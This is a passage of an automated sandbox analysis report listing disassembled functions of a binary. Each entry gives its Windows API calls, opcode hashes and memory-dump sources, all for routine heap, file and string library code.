                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                                                                                            • Instruction ID: d2c11db27692aafaa4ce2e871d926bddf2b8157a8a53bd45798800a7a56f8073
                                                                                                                                                                            • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                                                                                            • Instruction Fuzzy Hash: 50F0F4335016249AC6213A6E9C05B5A3B98FF46334F108755FA6DD21D6EF70D8028693
                                                                                                                                                                            Function 0088500D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,008831B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088504E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: a86ee6d11a1e453e8b8d78fd3628c8c5839e8bcaa2829e94f3955a0155f1fcab
                                                                                                                                                                            • Instruction ID: d46f82acf2c6e02c64aac19a8abc1a4119d300cc9fa690ab249d7651aa7976ea
                                                                                                                                                                            • Opcode Fuzzy Hash: a86ee6d11a1e453e8b8d78fd3628c8c5839e8bcaa2829e94f3955a0155f1fcab
                                                                                                                                                                            • Instruction Fuzzy Hash: 30F0E231A09E286BDB317B26DC01B5A3748FF417A2B188025BC09EA191CA74D80087E1
                                                                                                                                                                            Function 00883BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A99,?,0000015D,?,?,?,?,008785D0,000000FF,00000000,?,?), ref: 00883BE2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: a9eae834f77b09d8a0683a18f75b5bb2679c946423b2f4dd0606b16c76959971
                                                                                                                                                                            • Instruction ID: 70545f323eeccf7306394ed24f7bd9e3bde72a88f12000ab7bb54223bd44ee23
                                                                                                                                                                            • Opcode Fuzzy Hash: a9eae834f77b09d8a0683a18f75b5bb2679c946423b2f4dd0606b16c76959971
                                                                                                                                                                            • Instruction Fuzzy Hash: 2FE06DB120562867E7213A6A9C01F5A7658FF42FB0F154121AC4AD61A2DB61DE0183F2
                                                                                                                                                                            Function 008563DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e355ab6b62ef50c54831c9f2292655bc97f9373442f0d943b3fd9d387b0ddeda
                                                                                                                                                                            • Instruction ID: 98122f2e237c275003bd99b47ea4e06b701349e7f5956f12540122481711b688
                                                                                                                                                                            • Opcode Fuzzy Hash: e355ab6b62ef50c54831c9f2292655bc97f9373442f0d943b3fd9d387b0ddeda
                                                                                                                                                                            • Instruction Fuzzy Hash: 2AF05270100712CFCB349F24D490812BBE0FA1432A324892EE59B87620D732A848CB00
                                                                                                                                                                            Function 0088510A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 0088512C
                                                                                                                                                                              • Part of subcall function 00882D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4), ref: 00882D6E
                                                                                                                                                                              • Part of subcall function 00882D58: GetLastError.KERNEL32(00921DC4,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4,00921DC4), ref: 00882D80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1353095263-0
                                                                                                                                                                            • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                                            • Instruction ID: 1143b02e01ecc49d09fa80d97686658833370961386e13aa6ba9d65c2c710ccc
                                                                                                                                                                            • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                                            • Instruction Fuzzy Hash: ACE0927A1417099FC720DF6CD804A82B7E5EF853203208529E89DD7220D371E812CB40
                                                                                                                                                                            Function 0085653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                            • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                                                                                            • Instruction ID: 1ce51d29e97229f3ec877f6d021873f809f912c56d496691728d58ff72712f9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF0F87540020DFFDF05DF94C941E9E7B79FB18318F208485F9199A152D336DA21EBA1
                                                                                                                                                                            Function 00854154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                                            • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                                                                                            • Instruction ID: 62755f4959761dd3b80a985ba91ad70ea664dc27bc45e1db3ac6ca998397df80
                                                                                                                                                                            • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7ED0A72334205036B669313D2D0BC7F491CDBC26A0B05903FFA0BCA1ADED448C0300F2
                                                                                                                                                                            Function 008BE783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 008BE7A2
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NamePathShort_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2021730007-0
                                                                                                                                                                            • Opcode ID: 4bb686bcb1371b322e3907e783ecb766d913895e8034f33e10a4164186f511ae
                                                                                                                                                                            • Instruction ID: 7a66622630476ccccff0799c8d9b52c04af4699e23b14c44b9cc44b9a7a94343
                                                                                                                                                                            • Opcode Fuzzy Hash: 4bb686bcb1371b322e3907e783ecb766d913895e8034f33e10a4164186f511ae
                                                                                                                                                                            • Instruction Fuzzy Hash: C4E0CD725002245BCB10A39C9C05FDA77DDFFC8791F040071FD05D7248DD64ED848591
                                                                                                                                                                            Function 0086F13C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,0085B0DE,?,?,00000000,?,00856B73,?), ref: 0086F156
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 1d77844b2189c2cca9742a27304bbe59dea713b2ed9d6c10423a820683625d04
                                                                                                                                                                            • Instruction ID: b37e3ba13e8cdb0402156c82d639d8d2624fe682876e0134dfae129434578e58
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d77844b2189c2cca9742a27304bbe59dea713b2ed9d6c10423a820683625d04
                                                                                                                                                                            • Instruction Fuzzy Hash: 37E092B5510704AFD728DF55D846D97BBF8EB08310B00455EA85697740E7B1BD448B50
                                                                                                                                                                            Function 008539DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008539FD
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                            • Opcode ID: ee365952edecdf31dec38d07a1095deb11286f3ef1aa0b8a9fbb671fcbc7b247
                                                                                                                                                                            • Instruction ID: 15479ea79a5a91cac985ed4c715a08e56da093c8824c9317fc12272cd73b7f3f
                                                                                                                                                                            • Opcode Fuzzy Hash: ee365952edecdf31dec38d07a1095deb11286f3ef1aa0b8a9fbb671fcbc7b247
                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0CD725002245BCB10A39C9C05FDA77DDEFC8791F040071FD05D7248DD64ED848591
                                                                                                                                                                            Function 008BE753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008BE76C
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FolderPath_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2987691875-0
                                                                                                                                                                            • Opcode ID: 292438bef0c6e37b5b60b64388ae4cd138dd0fad3a78fd5590caba39cae348ed
                                                                                                                                                                            • Instruction ID: 516e0e514030415b419f17fe95b7af13d98bab0ce208a021482a16a0ebe4e3ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 292438bef0c6e37b5b60b64388ae4cd138dd0fad3a78fd5590caba39cae348ed
                                                                                                                                                                            • Instruction Fuzzy Hash: 70D05EA19003287FEF60A6749C0DDB73AACD740214F0006A17C6DD3182E934ED4986A0
                                                                                                                                                                            Function 008BDA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,008BD9DC,?,?), ref: 008BDA72
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1304948518-0
                                                                                                                                                                            • Opcode ID: 584afab37252cad8ea90f8955cf214b6814e9659e99ee289b74af0c313ee00e4
                                                                                                                                                                            • Instruction ID: 9abc46180cf87c9182765c31c00886f5575b01c84484cb183d3b9c042740b253
                                                                                                                                                                            • Opcode Fuzzy Hash: 584afab37252cad8ea90f8955cf214b6814e9659e99ee289b74af0c313ee00e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6ED0A7305D0208BBEF108B50CC03F99B76CE701B45F104194B201EE0D0C7B5A5089724
                                                                                                                                                                            Function 0089073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00890AA4,?,?,00000000,?,00890AA4,00000000,0000000C), ref: 00890757
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
                                                                                                                                                                            • Instruction ID: c558b3bea8c0507ba4ed757fb557e85dce290fb8377fc8477d9c23b62fcc0623
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
                                                                                                                                                                            • Instruction Fuzzy Hash: 05D06C3200024DBFDF028F84DD46EDA3BAAFB48714F014000BE1856020C732E821AB91
                                                                                                                                                                            Function 008BE9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
                                                                                                                                                                            • Instruction ID: e9975e2cda599303618509b453bb1f25ac1bc1c65b3bc38091be839f80f2fd97
                                                                                                                                                                            • Opcode Fuzzy Hash: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 60B0922400061009BD780A3C1A480E92B01B8433A67D85B95E4F9D92E3C339980FE610
                                                                                                                                                                            Function 008C6561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008BDB69: FindFirstFileW.KERNELBASE(?,?), ref: 008BDBE0
                                                                                                                                                                              • Part of subcall function 008BDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 008BDC30
                                                                                                                                                                              • Part of subcall function 008BDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDC41
                                                                                                                                                                              • Part of subcall function 008BDB69: FindClose.KERNEL32(00000000), ref: 008BDC58
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008C6583
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                            • Opcode ID: 9b0aaf2dbe78e2355a46f6c7489ae05f74ce940c7bd62110ab2c84a6ebb68133
                                                                                                                                                                            • Instruction ID: 1f6f3b8bbbee815b3f9a2306c502dcfc1bb4ade264f640e2be3cf6aba5e8e9a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 9b0aaf2dbe78e2355a46f6c7489ae05f74ce940c7bd62110ab2c84a6ebb68133
                                                                                                                                                                            • Instruction Fuzzy Hash: EDF058322002149FCB14AF58D845B6AB7E5FF58761F048019F90ADB352CB70AD058B96
                                                                                                                                                                            Function 00857953 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,00000000,00893A1C), ref: 00857973
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
